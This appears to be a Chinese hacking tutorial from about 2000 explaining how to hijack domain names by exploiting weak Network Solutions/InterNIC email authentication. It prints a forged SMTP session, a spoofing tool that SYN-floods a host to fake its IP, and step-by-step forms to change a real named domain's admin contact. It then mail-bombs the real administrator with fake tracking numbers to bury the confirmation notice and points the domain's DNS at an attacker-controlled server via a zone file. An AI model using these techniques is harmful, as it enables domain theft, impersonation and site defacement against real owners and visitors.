利用InterNIC验证缺陷进行域名劫持
一、前言
Internet域名是不安全的,很容易被人劫持,例如前些日子163.net被人劫持了,指 向了其它的IP地址,当网民连接上去时还以为163.net被黑掉了。其实这并不是163.net 的责任,而是因为国际域名提供商InterNIC在身份验证上存在缺陷造成的。
二、InterNIC对用户请求进行身份验证的方法
下面我们先来看看InterNIC进行身份验证的四种方法:
MAILFROM:最普遍的验证方法,通过在域名登记时填写的Administrator的EMAIL地址 进行身份验证。
CRYPT:请求可以来自任意EMAIL地址,但是需要一个标准的UNIX crypt()加密的密码。 这是在注册时指定的。
PGP:把域名注册者的PGP公匙放进InterNIC的数据库中,当发送请求时必须使用私匙 进行数字签名。
FAX:用传真机把公司的信笺头或者公章传过去。
以上这些身份验证的方法都不是非常安全的,下面我们介绍对应的攻击方法。
三、相应的攻击方法
1、MAILFROM是最普遍的验证方法,对付它也最容易,一般就是利用伪造Administrator 的EMAIL地址发出修改域名注册信息的MAIL,由于SENDMAIL不检查实际的发送者的EMAIL 地址,所以我们可以非常轻松的伪造一封发自任意地址的信,当然这封信并没有完全被 伪造,用如下方法: telnet phunc.com 25 Trying 209.249.172.58... Connected to phunc.com (209.249.172.58). Escape character is \^]\. 220 darkness.phunc.com ESMTP Sendmail 8.9.2/8.9.2; Wed, 17 Mar 1999 12:01:25 -0800 (PST) >> HELO phunc.com 250 darkness.phunc.com Hello phunc.wsmg.digex.net [207.87.17.101], pleased to meet you >> MAIL FROM:[email protected] #在这里就伪造了发送者的EMAIL地址 250 [email protected]... Sender ok >> RCPT TO:[email protected] 250 [email protected]... Recipient ok >> DATA 354 Enter mail, end with \".\" on a line by itself >> I am isno. >> -isno >>[email protected] . 250 MAA36653 Message accepted for delivery QUIT 221 darkness.phunc.com closing connection Connection closed by foreign host.
当然,其实我们完全可以利用一些伪造信的软件来实现,我一般使用Kaboom!,凡是 电子邮件炸弹都有这个功能。
这样虽然伪造了发送者的EMAIL地址,但是还不是完全的伪造了,收信人可以查看邮件 的原始信息来看到实际发送者的IP。例如,上面例子发出的伪造信在接受者看来是这样 的: Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) From: [email protected] To: undisclosed-recipients: ;
I am isno. -isno
但是如果收信人看一下原始信息,他会看到: Return-Path: Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101]) by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653 for [email protected]; Wed, 17 Mar 1999 12:01:40 -0800 (PST) (envelope-from [email protected]) Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) From: [email protected] Message-Id: [email protected] To: undisclosed-recipients:;
I am isno. -isno
phunc.wsmg.digex.net就显示了发送者的实际地址。要完全伪造发送地址需要用到IP 欺骗,有一种专门的程序可以实现,它是这样使用的:
# spoofmail -f [email protected] -h www.whitehouze.gov -t [email protected] -m phunc.com Originator : [email protected] Fakehost : www.whitehouze.gov Mail To : [email protected] Mail Server: phunc.com
Enter your message ending with a period on a line by itself: Hi knight. I am Bill, your president. I wanted to thank you for your recent shipment of cigars. -Bill . Guessing SYN/ACK...108400. Synflooding www.whitehouze.gov... Connecting as www.whitehouze.gov to phunc.com. Sending mail... Sent. Synflooding stopped. Connection closed. #
这就伪造了一封发自克林顿的邮件,原始信息也看不出任何破绽:
Return-Path: Received: from phunc.com (www.whitehouze.gov [209.81.9.231]) by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653 for [email protected]; Wed, 17 Mar 1999 12:01:40 -0800 (PST) (envelope-from [email protected]) Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) From: [email protected] Message-Id: [email protected] To: undisclosed-recipients:;
Hi knight. I am Bill, your president. I wanted to thank you for your recent shipment of cigars. -Bill
咳……好象有点跑题了,应该说域名劫持,我怎么说成了伪造电子邮件了?其实用不着 这么麻烦,只要用邮件炸弹简单的伪造一封邮件就可以骗过InterNIC了,具体实现方法 的过程我会在后面详细的介绍。
2、对付CRYPT加密的口令没有什么好方法,看来这种验证方法是比较安全的:-<
3、PGP签名的验证看起来很安全了吧?可是InterNIC简直就是……。如果你发送一封 伪造EMAIL地址的请求信件而不使用PGP签名给InterNIC,你猜会怎样?InterNIC会拒绝 你的请求吗?哈哈,InterNIC完全忽视没有使用PGP签名的问题,而只是根据MAILFROM 来鉴别认证,这不能不说是InterNIC的最大失误。
4、传真验证也很容易被利用,这需要一些社会工程学技巧,说白了就是骗人嘛!这里 不打算讨论了,你自己琢磨去吧……
四、利用伪造EMAIL地址进行域名劫持的具体步骤
由于MAILFROM验证只是简单的查看管理员的邮件地址,所以很容易被利用,而且如前所 述,PGP验证也可以利用MAILFROM的方法来进行攻击,下面就介绍利用伪造电子邮件来 进行域名劫持的具体方法。
所需工具:
匿名邮件发送工具或邮件炸弹工具; 一个浏览器,如IE; 在任何免费邮件提供商的一个邮件帐号,如hotmail.com。
在下面的例子中,我们假定要劫持的域名是wi2000.org,Let\s go!
先通过浏览器连到networksolutions.com,点击“Who Is”按钮,输入要查询的域名, 这里是wi2000.org,然后点“Search”。
于是WHOIS会显示如下域名信息:
___________________________________________________________ Registrant: WI2000 (WI24-DOM) Blixered 1 Goteborg, Lila Edet 46394 SE
Domain Name: WI2000.ORG
Administrative Contact: MICKE, ANDERSSON (AMM367) [email protected] 545326-3445 (FAX) 545326-3445 Technical Contact, Zone Contact: Jason, Berresford (BJE41) [email protected] 1-(905)-765-5212 Billing Contact: MICKE, ANDERSSON (AMM367) [email protected] 545326-3445 (FAX) 545326-3445
Record last updated on 22-Jan-2000. Record created on 19-Dec-1999. Database last updated on 3-Feb-2000 14:29:53 EST.
Domain servers in listed order:
NS1.CAN-HOST.COM 24.215.1.6 NS2.MOUNTAINCABLE.NET 24.215.0.12 ____________________________________________________________
下面我们就通过改变管理员操作信息完全控制该域名。
这种方法有一定的危险性,请慎重行事!
下面我们就可是正式的攻击,按照如下步骤进行:
- 连上http://www.networksolutions.com/;
- 点击“Make Changes”;
- 输入域名wi2000.org;
- 会出现两个按钮,点击其中的“Expert”;
- 下一屏会出现标题“Select the form that meets your needs”;
- 点击“Contact Form”;
- 下面会出现有两个域的表单;
- 在第一个域中填入管理员的操作名,在本例中wi2000.org的管理员是AMM367;
- 在第二个域中填入管理员的EMAIL地址,本例中是[email protected];
- 把选项改为“Modify”;
- 现在点击“Proceed to Contact Information”;
- 选择“MAIL-FROM”并点击“Go on to Contact Data Information”;
- 下面你应该可以看到这个域名的管理员的联系的全部信息;
- 在EMAIL地址域里把EMAIL改为你自己的假冒EMAIL地址,例如我把它改为 [email protected];
- 点击“Proceed to Set Authorization Scheme”;
- 再一次选择“MAIL-FROM”并填入管理员的EMAIL地址,这里是 [email protected];
- 把底部的选项设为“No”和“Generate Contact Form”;
- 现在你应该看到一个所有信息的模板,大概是这个样子:
_______________________________________________________________________ ******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............:
Contact Information 1a. NIC Handle..............: AMM367 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: MICKE, ANDERSSON 1d. Organization Name.......: WI2000 1e. Street Address..........: BLIXERED 1 1f. City....................: GOTEBORG 1g. State...................: LILLA EDET 1h. Postal Code.............: 46394 1i. Country.................: SE 1j. Phone Number............: 545326-3445 1k. Fax Number..............: 545326-3445 1l. E-Mailbox...............: [email protected]
Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE
Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: [email protected] 3c. Public (Y/N)............: NO ______________________________________________________________________
注意:这时千万不要点击底部的“Mail this contact form to me!”按钮,否则 就前功尽弃了!
下面把上面这些模板信息拷贝到你的匿名邮件发送软件或邮件炸弹上去,但是先不要 发送!下面是最复杂的部分了。
当你把这些信息寄到[email protected],会有以下信息被发送到 域名管理员的信箱里:
____________________________________ Subject: [NIC-000128.4r50] Your Mail __________________________________________________________________________ This is an automatic reply to acknowledge that your message has been received by [email protected]. This acknowledgement is \"NOT\" a confirmation that your request has been processed. You will be notified when it has been completed.
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL\s:
Domain Name Registration Service Agreement http://www.networksolutions.com/legal/service-agreement.html Domain Name Registration Template ftp://www.networksolutions.com/templates/domain-template.txt
Regards, Network Solutions Registration Services
***********************************************
*********************************************** IMPORTANT INFORMATION *********************************************** On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt for all template requests.
The terms and conditions of the Service Agreement are available on our Web site at http://www.networksolutions.com/legal/service-agreement.html. ************************************************
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant抯 address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to [email protected]. This form is available on our Web site at www.networksolutions.com
To register or update information about a name server, complete and submit the Host Form to [email protected]. This form is also available on our Web site.
Network Solutions Registration Services e-mail: [email protected] _______________________________________________________________________
现在这些信息就会给我们的攻击带来麻烦,真正的管理员介绍到这封信就会发现我们 的诡计了,但是我们仍然有办法。用你的邮件炸弹发送20~30封相似的邮件炸弹到 该管理员的信箱,当他看到二三十封相似的信时,会以为这是某些人在用邮件炸弹 开玩笑,一般就会把这些信都删除掉,这样一来我们就安全了。
即使他要回复这些信,一般也会弄错跟踪号码,这里的跟踪号码是[NIC-000128.4r50]。 当然你用邮件炸弹炸他的时候不能使用真正的跟踪号,应该伪造几个不同的跟踪号码。 下面是一些常见的跟踪号:
[NIC-000127.5089] [NIC-000128.4rg7] [NIC-000128.523f] [NIC-000127.53d0] [NIC-000129.r609] [NIC-000128.3f6y] [NIC-000128.5d8t] [NIC-000127.r509] [NIC-000128.4r30] [NIC-000127.d307] _____
注意:不仅在标题处改变这些号码,在邮件当中也要改变。
在本例中你应该假冒[email protected]发送EMAIL信息到 [email protected],信件标题和内容如前所述。
当你向他发送到10~15个信息时停止发送,下面我们伪装成 [email protected]向[email protected]发送伪造的回复 信,内容如下所示:
_______________________________________________________________________ ******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............:
Contact Information 1a. NIC Handle..............: AMM367 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: MICKE, ANDERSSON 1d. Organization Name.......: WI2000 1e. Street Address..........: BLIXERED 1 1f. City....................: GOTEBORG 1g. State...................: LILLA EDET 1h. Postal Code.............: 46394 1i. Country.................: SE 1j. Phone Number............: 545326-3445 1k. Fax Number..............: 545326-3445 1l. E-Mailbox...............: [email protected]
Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE
Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: [email protected] 3c. Public (Y/N)............: NO ______________________________________________________________________ _____
注意:在邮件标题栏中不要填任何东西~~!
然后发送这封邮件,只发一封,不要用邮件炸弹去炸 [email protected]。
下面继续用邮件炸弹去炸[email protected],直到发送完30~35封不同 跟踪号码的炸弹为止。
下面就是等待了,一般24小时以后你就成为wi2000.org这个域名的管理员了,然后就 可以对这个域名为所欲为了。
例如我要把wi2000.org指向其它的IP地址,可以按照如下步骤:
- 打开浏览器,输入 http://www.networksolutions.com/cgi-bin/makechanges/change-registrar;
- 输入目标,如wi2000.org;
- 输入相关信息,写下Administrative 的email地址,现在是[email protected];
- 更改目标的dns服务器为你能控制的dns服务器,例如我已经控制了ns.some.com,就 把dns服务器改为ns.some.com;
- 确认;
- 过2、3分钟,在会收到一份[email protected]的信件,让你确认。
- 确认之。
这样wi2000.org的名字服务器就被换成了ns.some.com,然后我们就到ns.some.com上去 修改Zone文件,想要找到Zone文件的位置可以先去/etc/named.boot中查看,在其中 增加一条:
primary wi2000.org wi2000.hosts
找到directory \"/var/named\"这句,说明Zone文件放在/var/named文件下,在 /var/named下建立一个wi2000.hosts文件,内容如下:
@ IN SOA ns.some.net. cf.pub.some.com. ( 1999111802 10800 3600 604800 86400 ) @ IN NS ns.some.com. www IN A 204.192.96.173
204.192.96.173是另外一台被我们控制了的主机,然后在命令行上重新启动名字 服务器:
#/etc/rc.d/init.d/named restart
注意:以上操作都假设ns.some.com的名字服务器是BIND。
这样当有人通过浏览器连接www.wi2000.org时,他就会连向204.192.96.173, 因为204.192.96.173已经被我们控制,我们就可以随意修改它的主页,这样别人还 以为www.wi2000.org被黑了!
注意:以上这种方法只限于在InterNIC注册的管理员EMAIL和技术EMAIL不同时才有效。
参考资料:
A guide to exploiting Network Solution\s InterNIC.------knight ([email protected])
Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme---------Lucifer Mirza ([email protected])
Contact me:
e-mail: [email protected] homepage: http://isno.yeah.net irc: 202.96.137.64:6667 #darksun
My PGP key:
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i
mQCNAzms8foAAAEEAKHdhUomcQ07xx//rfv40gJUU4aZMfQy/4NAc4UUUVv/ObM4 pDYvbzPblEBIincbMwGKJZqosuk392F5hBZqt7aIGlvhnGzMDf8cIAQknIYvUn+H GCy0nOqLhFQusMxrSwMy33BTjMrqmwQr/ZjjfM8ObaOROeo1rCplpLS4wRQ9AAUR tARpc25viQCVAwUQOazx+iplpLS4wRQ9AQHceAP8DzZzv/n1xFCZSm1Q9C29bSgf uRRX5qV8tufQMAL8KWnomo1I9kvnUUTvYwgn1uc5uHysbNERyHad3MY+a7k94IAx dcX0CYlDnW8koNzGTO6TjdzfByzckb5dvp9fDH3PhjZ8trtN4z6jYQkG5MvPC80h NxBrN0SwiJKIapj29gI= =JP/1 -----END PGP PUBLIC KEY BLOCK-----
-EOF
发布人:Crystal 来自:转发